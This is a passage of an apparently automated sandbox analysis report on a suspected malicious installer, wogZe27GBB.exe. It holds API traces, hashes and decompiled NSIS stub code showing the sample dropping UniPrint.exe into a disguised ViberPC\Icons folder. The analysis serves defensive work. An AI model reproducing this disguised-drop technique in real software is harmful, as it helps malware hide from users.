                                                                                                          • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                        • lstrcat.KERNEL32(1033,004204A0), ref: 00403720
                                                                                                        • lstrlen.KERNEL32( "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe",?,?,?, "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe",00000000,C:\Users\user\AppData\Roaming\ViberPC\Icons,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\wogZe27GBB.exe" ), ref: 00403795
                                                                                                        • lstrcmpi.KERNEL32 ref: 004037A8
                                                                                                        • GetFileAttributesA.KERNEL32( "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe"), ref: 004037B3
                                                                                                        • LoadImageA.USER32 ref: 004037FC
                                                                                                          • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                                        • RegisterClassA.USER32 ref: 00403843
                                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040385B
                                                                                                        • CreateWindowExA.USER32 ref: 00403894
                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 004038CA
                                                                                                        • LoadLibraryA.KERNEL32(RichEd20), ref: 004038DB
                                                                                                        • LoadLibraryA.KERNEL32(RichEd32), ref: 004038E6
                                                                                                        • GetClassInfoA.USER32 ref: 004038F6
                                                                                                        • GetClassInfoA.USER32 ref: 00403903
                                                                                                        • RegisterClassA.USER32 ref: 0040390C
                                                                                                        • DialogBoxParamA.USER32 ref: 0040392B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                        • String ID: "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe"$"C:\Users\user\Desktop\wogZe27GBB.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\ViberPC\Icons$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                        • API String ID: 914957316-433471711
                                                                                                        • Opcode ID: df3e65e4785b10912f2cc945d8ce61fae7cc82ae08d3dd313a0b53a2ea4163e5
                                                                                                        • Instruction ID: 5edcd83abe1923a5ef33726047749e404321c8c293ca1ea02831498dc8d0bb6f
                                                                                                        • Opcode Fuzzy Hash: df3e65e4785b10912f2cc945d8ce61fae7cc82ae08d3dd313a0b53a2ea4163e5
                                                                                                        • Instruction Fuzzy Hash: A961A3B16442007FD720AF659D45E2B3AADEB4475AF40457FF940B22E1D77CAD01CA2E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402C72, Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 203memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 96%
                                                                                                        			E00402C72(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				long _t82;
				void* _t83;
				signed int _t89;
				intOrPtr _t92;
				void* _t101;
				signed int _t103;
				void* _t105;
				long _t106;
				long _t109;
				intOrPtr* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\wogZe27GBB.exe", 0x400);
				_t105 = E0040583D("C:\\Users\\hardz\\Desktop\\wogZe27GBB.exe", 0x80000000, 3);
				 *0x409014 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405B66(0x42b000, E004056A0(E00405B66("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\wogZe27GBB.exe"), "C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				 *0x41f050 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BD3(1);
					if( *0x423eb4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t110 = GlobalAlloc(0x40, _v20);
						E00405F62(0x40afb8);
						E0040586C( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x409018 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031F1( *0x423eb4 + 0x1c);
							 *0x41f054 = _t65;
							 *0x417048 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F18(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
								} while (_t101 != 0);
								_t71 =  *0x417044; // 0x4e4bea
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E004057FE(0x423ec0, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031F1( *0x417040);
					if(E004031BF( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031BF(0x417050, _t106); // executed
						if(_t83 == 0) {
							E00402BD3(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423eb4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BD3(0);
							}
							goto L19;
						}
						E004057FE( &_v40, 0x417050, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							_t103 =  *0x417040; // 0x0
							 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x423eb4 = _t103;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x41f050) {
							_v8 = E00405EF4(_v8, 0x417050, _t106);
						}
						 *0x417040 =  *0x417040 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 > 0);
					goto L22;
				}
			}





























                                                                                                        0x00402c80
                                                                                                        0x00402c83
                                                                                                        0x00402c9d
                                                                                                        0x00402ca2
                                                                                                        0x00402cb5
                                                                                                        0x00402cba
                                                                                                        0x00402cc0
                                                                                                        0x00000000
                                                                                                        0x00402cc2
                                                                                                        0x00402ce4
                                                                                                        0x00402ceb
                                                                                                        0x00402cf3
                                                                                                        0x00402cf8
                                                                                                        0x00402cfa
                                                                                                        0x00402dea
                                                                                                        0x00402dec
                                                                                                        0x00402df8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402e01
                                                                                                        0x00402e2d
                                                                                                        0x00402e3d
                                                                                                        0x00402e3f
                                                                                                        0x00402e50
                                                                                                        0x00402e6b
                                                                                                        0x00402e74
                                                                                                        0x00402e79
                                                                                                        0x00402e98
                                                                                                        0x00402ea8
                                                                                                        0x00402eba
                                                                                                        0x00402ebf
                                                                                                        0x00402ec7
                                                                                                        0x00402ed4
                                                                                                        0x00402edc
                                                                                                        0x00402ee1
                                                                                                        0x00402ee3
                                                                                                        0x00402ee3
                                                                                                        0x00402eeb
                                                                                                        0x00402eeb
                                                                                                        0x00402eee
                                                                                                        0x00402eef
                                                                                                        0x00402eef
                                                                                                        0x00402ef2
                                                                                                        0x00402ef4
                                                                                                        0x00402ef4
                                                                                                        0x00402ef7
                                                                                                        0x00402efe
                                                                                                        0x00402f0a
                                                                                                        0x00000000
                                                                                                        0x00402f0f
                                                                                                        0x00000000
                                                                                                        0x00402ec7
                                                                                                        0x00000000
                                                                                                        0x00402e7b
                                                                                                        0x00402e09
                                                                                                        0x00402e1b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402d00
                                                                                                        0x00402d00
                                                                                                        0x00402d05
                                                                                                        0x00402d09
                                                                                                        0x00402d10
                                                                                                        0x00402d17
                                                                                                        0x00402d19
                                                                                                        0x00402d19
                                                                                                        0x00402d21
                                                                                                        0x00402d28
                                                                                                        0x00402e87
                                                                                                        0x00402ec9
                                                                                                        0x00000000
                                                                                                        0x00402ec9
                                                                                                        0x00402d34
                                                                                                        0x00402db8
                                                                                                        0x00402dbb
                                                                                                        0x00402dc0
                                                                                                        0x00000000
                                                                                                        0x00402db8
                                                                                                        0x00402d41
                                                                                                        0x00402d46
                                                                                                        0x00402d4e
                                                                                                        0x00402d74
                                                                                                        0x00402d7a
                                                                                                        0x00402d83
                                                                                                        0x00402d89
                                                                                                        0x00402d8e
                                                                                                        0x00402d94
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402d9e
                                                                                                        0x00402da6
                                                                                                        0x00402da9
                                                                                                        0x00402dae
                                                                                                        0x00402db0
                                                                                                        0x00402db0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402d9e
                                                                                                        0x00402dc1
                                                                                                        0x00402dc7
                                                                                                        0x00402dd7
                                                                                                        0x00402dd7
                                                                                                        0x00402dda
                                                                                                        0x00402de0
                                                                                                        0x00402de2
                                                                                                        0x00000000
                                                                                                        0x00402d00

                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 00402C86
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\wogZe27GBB.exe,00000400), ref: 00402CA2
                                                                                                          • Part of subcall function 0040583D: GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\wogZe27GBB.exe,80000000,00000003), ref: 00405841
                                                                                                          • Part of subcall function 0040583D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\wogZe27GBB.exe,C:\Users\user\Desktop\wogZe27GBB.exe,80000000,00000003), ref: 00402CEB
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00409130), ref: 00402E32
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                        • String ID: "C:\Users\user\Desktop\wogZe27GBB.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\wogZe27GBB.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$KN
                                                                                                        • API String ID: 2803837635-1708233607
                                                                                                        • Opcode ID: 6147c8ce7f916bf316bc462c049502f5517c6654920939d23064a14b970bc3fe
                                                                                                        • Instruction ID: 0b72a330c31c6d4d52753dad6a5c3012229d4666e6dae103a7747cbc92612fb8
                                                                                                        • Opcode Fuzzy Hash: 6147c8ce7f916bf316bc462c049502f5517c6654920939d23064a14b970bc3fe
                                                                                                        • Instruction Fuzzy Hash: B761E231A40215ABDB20DF64DE49B9E7BB4EB04315F20407BF904B62D2D7BC9E458B9C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401734, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147stringtimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 73%
                                                                                                        			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t40;
				void* _t42;
				FILETIME* _t48;
				FILETIME* _t60;
				void* _t62;
				signed int _t68;
				FILETIME* _t69;
				FILETIME* _t73;
				signed int _t75;
				void* _t78;
				intOrPtr _t80;
				void* _t83;

				_t73 = __ebx;
				_t80 = E004029F6(0x31);
				 *((intOrPtr*)(_t83 - 8)) = _t80;
				 *(_t83 + 8) =  *(_t83 - 0x24) & 0x00000007;
				_t33 = E004056C6(_t80);
				_push(_t80);
				if(_t33 == 0) {
					_push(E00405659(E00405B66(0x409b70, "C:\\Users\\hardz\\AppData\\Roaming\\ViberPC\\Icons"), _t34));
					L00405B82();
				} else {
					_push(0x409b70);
					__eax = E00405B66();
				}
				E00405DC8(0x409b70);
				while(1) {
					__eflags =  *(_t83 + 8) - 3;
					if( *(_t83 + 8) >= 3) {
						_t62 = E00405E61(0x409b70);
						_t75 = 0;
						__eflags = _t62 - _t73;
						if(_t62 != _t73) {
							_t69 = _t62 + 0x14;
							__eflags = _t69;
							_t75 = CompareFileTime(_t69, _t83 - 0x18);
						}
						asm("sbb eax, eax");
						_t68 =  ~(( *(_t83 + 8) + 0xfffffffd | 0x80000000) & _t75) + 1;
						__eflags = _t68;
						 *(_t83 + 8) = _t68;
					}
					__eflags =  *(_t83 + 8) - _t73;
					if( *(_t83 + 8) == _t73) {
						E0040581E(0x409b70);
					}
					__eflags =  *(_t83 + 8) - 1;
					_t40 = E0040583D(0x409b70, 0x40000000, (0 |  *(_t83 + 8) != 0x00000001) + 1);
					__eflags = _t40 - 0xffffffff;
					 *(_t83 - 0x34) = _t40;
					if(_t40 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t83 + 8) - _t73;
					if( *(_t83 + 8) != _t73) {
						E00404F04(0xffffffe2,  *((intOrPtr*)(_t83 - 8)));
						__eflags =  *(_t83 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t83 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t83 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405B66(0x40a370, 0x424000);
						E00405B66(0x424000, 0x409b70);
						E00405B88(_t73, 0x40a370, 0x409b70, " "C:\Users\hardz\AppData\Roaming\ViberPC\Icons\UniPrint.exe"",  *((intOrPtr*)(_t83 - 0x10)));
						E00405B66(0x424000, 0x40a370);
						_t60 = E00405427(" "C:\Users\hardz\AppData\Roaming\ViberPC\Icons\UniPrint.exe"",  *(_t83 - 0x24) >> 3) - 4;
						__eflags = _t60;
						if(_t60 == 0) {
							continue;
						} else {
							__eflags = _t60 == 1;
							if(_t60 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t48 = 0;
								__eflags = 0;
							} else {
								_push(0x409b70);
								_push(0xfffffffa);
								E00404F04();
								L29:
								_t48 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t48;
				}
				E00404F04(0xffffffea,  *((intOrPtr*)(_t83 - 8)));
				 *0x423f54 =  *0x423f54 + 1;
				_t42 = E00402F18(_t75,  *((intOrPtr*)(_t83 - 0x1c)),  *(_t83 - 0x34), _t73, _t73); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t83 - 0x18) - 0xffffffff;
				_t78 = _t42;
				if( *(_t83 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t83 - 0x34), _t83 - 0x18, _t73, _t83 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t83 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t83 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t83 - 0x34)); // executed
				__eflags = _t78 - _t73;
				if(_t78 >= _t73) {
					goto L31;
				} else {
					__eflags = _t78 - 0xfffffffe;
					if(_t78 != 0xfffffffe) {
						E00405B88(_t73, _t78, 0x409b70, 0x409b70, 0xffffffee);
					} else {
						E00405B88(_t73, _t78, 0x409b70, 0x409b70, 0xffffffe9);
						_push( *((intOrPtr*)(_t83 - 8)));
						_push(0x409b70);
						L00405B82();
					}
					_push(0x200010);
					_push(0x409b70);
					E00405427();
					goto L29;
				}
				goto L33;
			}
















                                                                                                        0x00401734
                                                                                                        0x0040173b
                                                                                                        0x00401744
                                                                                                        0x00401747
                                                                                                        0x0040174a
                                                                                                        0x0040174f
                                                                                                        0x00401757
                                                                                                        0x00401772
                                                                                                        0x00401773
                                                                                                        0x00401759
                                                                                                        0x00401759
                                                                                                        0x0040175a
                                                                                                        0x0040175a
                                                                                                        0x00401779
                                                                                                        0x00401783
                                                                                                        0x00401783
                                                                                                        0x00401787
                                                                                                        0x0040178a
                                                                                                        0x0040178f
                                                                                                        0x00401791
                                                                                                        0x00401793
                                                                                                        0x00401798
                                                                                                        0x00401798
                                                                                                        0x004017a3
                                                                                                        0x004017a3
                                                                                                        0x004017b4
                                                                                                        0x004017b6
                                                                                                        0x004017b6
                                                                                                        0x004017b7
                                                                                                        0x004017b7
                                                                                                        0x004017ba
                                                                                                        0x004017bd
                                                                                                        0x004017c0
                                                                                                        0x004017c0
                                                                                                        0x004017c7
                                                                                                        0x004017d6
                                                                                                        0x004017db
                                                                                                        0x004017de
                                                                                                        0x004017e1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004017e3
                                                                                                        0x004017e6
                                                                                                        0x00401840
                                                                                                        0x00401845
                                                                                                        0x004015a8
                                                                                                        0x0040265c
                                                                                                        0x0040265c
                                                                                                        0x0040288b
                                                                                                        0x0040288e
                                                                                                        0x0040288e
                                                                                                        0x00000000
                                                                                                        0x004017e8
                                                                                                        0x004017ee
                                                                                                        0x004017f9
                                                                                                        0x00401806
                                                                                                        0x00401811
                                                                                                        0x00401827
                                                                                                        0x00401827
                                                                                                        0x0040182a
                                                                                                        0x00000000
                                                                                                        0x00401830
                                                                                                        0x00401830
                                                                                                        0x00401831
                                                                                                        0x0040184e
                                                                                                        0x00402894
                                                                                                        0x00402894
                                                                                                        0x00402894
                                                                                                        0x00401833
                                                                                                        0x00401833
                                                                                                        0x00401834
                                                                                                        0x00401492
                                                                                                        0x0040220e
                                                                                                        0x0040220e
                                                                                                        0x0040220e
                                                                                                        0x00401831
                                                                                                        0x0040182a
                                                                                                        0x00402896
                                                                                                        0x0040289a
                                                                                                        0x0040289a
                                                                                                        0x0040185e
                                                                                                        0x00401863
                                                                                                        0x00401871
                                                                                                        0x00401876
                                                                                                        0x0040187c
                                                                                                        0x00401880
                                                                                                        0x00401882
                                                                                                        0x0040188a
                                                                                                        0x00401896
                                                                                                        0x00401884
                                                                                                        0x00401884
                                                                                                        0x00401888
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00401888
                                                                                                        0x0040189f
                                                                                                        0x004018a5
                                                                                                        0x004018a7
                                                                                                        0x00000000
                                                                                                        0x004018ad
                                                                                                        0x004018ad
                                                                                                        0x004018b0
                                                                                                        0x004018c8
                                                                                                        0x004018b2
                                                                                                        0x004018b5
                                                                                                        0x004018ba
                                                                                                        0x004018bd
                                                                                                        0x004018be
                                                                                                        0x004018be
                                                                                                        0x004018cd
                                                                                                        0x004018d2
                                                                                                        0x00402209
                                                                                                        0x00000000
                                                                                                        0x00402209
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00401773
                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,00409B70,00409B70,00000000,00000000,00409B70,C:\Users\user\AppData\Roaming\ViberPC\Icons,00000000,00000000,00000031), ref: 0040179D
                                                                                                          • Part of subcall function 00405B66: lstrcpyn.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                          • Part of subcall function 00404F04: lstrcat.KERNEL32(0041FC78,00402C4A), ref: 00404F60
                                                                                                          • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Roaming\ViberPC\Icons, xrefs: 00401761
                                                                                                        • "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe", xrefs: 00401801, 0040181D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                        • String ID: "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe"$C:\Users\user\AppData\Roaming\ViberPC\Icons
                                                                                                        • API String ID: 1941528284-1164547758
                                                                                                        • Opcode ID: c50c07e9c34bb8d8f3066d7714e9e00841c620ef4e08def9809282e1cb43631e
                                                                                                        • Instruction ID: ca24b6133afb507e547736dc5ab02d451b7f1a2d30e0a517c5ad6537af4b780a
                                                                                                        • Opcode Fuzzy Hash: c50c07e9c34bb8d8f3066d7714e9e00841c620ef4e08def9809282e1cb43631e
                                                                                                        • Instruction Fuzzy Hash: 8441C131900515BBCB10BFB5DD46EAF3A79EF01369B24433BF511B11E1D63C9A418AAD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402F18, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 109fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E00402F18(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x417044 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E00403043(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x417044 =  *0x417044 + _t57;
						_t32 = E00403043(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x417044 =  *0x417044 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409018, 0x413040, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413040, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x417044 =  *0x417044 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

















                                                                                                        0x00402f1d
                                                                                                        0x00402f27
                                                                                                        0x00402f30
                                                                                                        0x00402f34
                                                                                                        0x00402f3f
                                                                                                        0x00402f3f
                                                                                                        0x00402f47
                                                                                                        0x00402f49
                                                                                                        0x00402f50
                                                                                                        0x00402f6c
                                                                                                        0x00402f70
                                                                                                        0x00403039
                                                                                                        0x00403039
                                                                                                        0x00000000
                                                                                                        0x00402f7f
                                                                                                        0x00402f82
                                                                                                        0x00402f88
                                                                                                        0x00402f8f
                                                                                                        0x00402f92
                                                                                                        0x00402f9b
                                                                                                        0x00403008
                                                                                                        0x0040300e
                                                                                                        0x00403010
                                                                                                        0x00403010
                                                                                                        0x00403022
                                                                                                        0x00403026
                                                                                                        0x00000000
                                                                                                        0x00403028
                                                                                                        0x00403028
                                                                                                        0x0040302b
                                                                                                        0x00403031
                                                                                                        0x00000000
                                                                                                        0x00403031
                                                                                                        0x00402f9d
                                                                                                        0x00402fa0
                                                                                                        0x00403034
                                                                                                        0x00403034
                                                                                                        0x00402fa6
                                                                                                        0x00402fab
                                                                                                        0x00402fab
                                                                                                        0x00402fb3
                                                                                                        0x00402fb5
                                                                                                        0x00402fb5
                                                                                                        0x00402fc6
                                                                                                        0x00402fca
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402fde
                                                                                                        0x00402fe6
                                                                                                        0x00403004
                                                                                                        0x0040303b
                                                                                                        0x0040303b
                                                                                                        0x00402fed
                                                                                                        0x00402fed
                                                                                                        0x00402ff0
                                                                                                        0x00402ff3
                                                                                                        0x00402ff6
                                                                                                        0x00403000
                                                                                                        0x00000000
                                                                                                        0x00403002
                                                                                                        0x00000000
                                                                                                        0x00403002
                                                                                                        0x00403000
                                                                                                        0x00000000
                                                                                                        0x00402fe6
                                                                                                        0x00000000
                                                                                                        0x00402fab
                                                                                                        0x00402fa0
                                                                                                        0x00402f9b
                                                                                                        0x00402f92
                                                                                                        0x00402f70
                                                                                                        0x0040303c
                                                                                                        0x00403040

                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402F3F
                                                                                                        • ReadFile.KERNELBASE(00409130,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130), ref: 00402F6C
                                                                                                        • ReadFile.KERNELBASE(00413040,00004000,?,00000000,00409130,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FC6
                                                                                                        • WriteFile.KERNELBASE(00000000,00413040,?,000000FF,00000000,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FDE
                                                                                                        Strings
                                                                                                        Memory Dump Source
